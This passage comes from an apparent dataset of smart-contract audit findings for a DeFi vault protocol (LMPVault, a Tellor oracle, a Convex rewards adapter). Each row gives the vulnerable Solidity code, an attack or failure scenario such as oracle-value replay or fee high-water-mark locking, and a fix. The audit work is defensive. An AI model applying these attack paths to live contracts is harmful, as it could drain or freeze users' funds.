= previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible that the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = _calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\n","Ensure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments and/or documentation.","It was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.","```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n" +Malicious users could lock in the NAV/Share of the DV to cause the loss of fees,medium,"The `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV (Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, when the NAV/Share of the LMPVault is 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n",Issue Malicious users could lock in the NAV/Share of the DV to cause the loss of fees\\nConsider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict the access to the `updateDebtReporting` function to only protocol-owned addresses.,Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n" +Malicious users could use back old values,medium,"Per the Teller's User Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lack measure to guard against such attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.","Update the affected function as per the recommendation in Teller's User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId]\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n","Malicious users could manipulate the price returned by the oracle to be higher or lower than expected. The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.","```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n" +Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`,medium,"The primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a ""balanceOf()""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its management of ""stash tokens"" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might incapacitate the destination vault from claiming rewards from AURA, resulting in protocol losses.","To accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.","The `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.","```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a ""balanceOf()""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n" +`navPerShareHighMark` not reset to 1.0,medium,"The LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.","Consider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\n",Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n" +Vault cannot be added back into the vault registry,medium,"When removing a vault from the registry, all states related to the vaults such as the `_vaults`, `_assets`, `_vaultsByAsset` are cleared except the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry even though the vault does not exist in the registry anymore.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\n","Clear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if (!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n",The `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. It affects all the operations of the protocol that rely on the vault registry.,"```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n" +LMPVault.updateDebtReporting could underflow because of subtraction before addition,medium,"`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem 1 share and previewRedeem request 1 `maxAssetsToPull`\\n2 debt would be burn\\nTherefore totalDebt = 11-2 = 9\\ncall another redeem 1 share and request another 1 `maxAssetsToPull`\\n2 debts would be burn again and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nUsing 1, 10 and 11 are for illustration and the underflow could occur in several other ways. E.g if we had used `100,001`, `1,000,010` and `1,000,011` respectively.",Add before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\n,"_updateDebtReporting could underflow and break a very important core functionality of the protocol. updateDebtReporting is so critical that funds could be lost if it doesn't work. Funds could be lost both when the vault is in profit or at loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more asset for their shares (based on the profit).\\nIf in loss, the whole vault asset is locked and withdrawals won't be successful because the Net Asset Value is not supposed to reduce by such action (noNavDecrease modifier). Net Asset Value has reduced because the loss would reduce totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. And those impacted the most are those with large funds. The bigger the fund, the more NAV would decrease by withdrawals.","```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n" +LMPVault: DoS when `feeSink` balance hits `perWalletLimit`,medium,"`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\n`_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. `updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally so they will be unfunctional.",Allow `feeSink` to exceeds `perWalletLimit`.,"`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.","```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n" +Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is called,medium,"The issue occurs in the `flashRebalance` function below :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to receive th tokenIn amount which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan) : `tokenInBalanceAfter` - `tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter` - tokenInBalanceBefore.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to DV then what was intended or this error can cause a DOS of the `flashRebalance` function (due to the insufficient amount error when performing the transfer to DV), all of this will make the rebalance operation fail (or not done correctely) which can have a negative impact on the LMPVault.","Use the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n 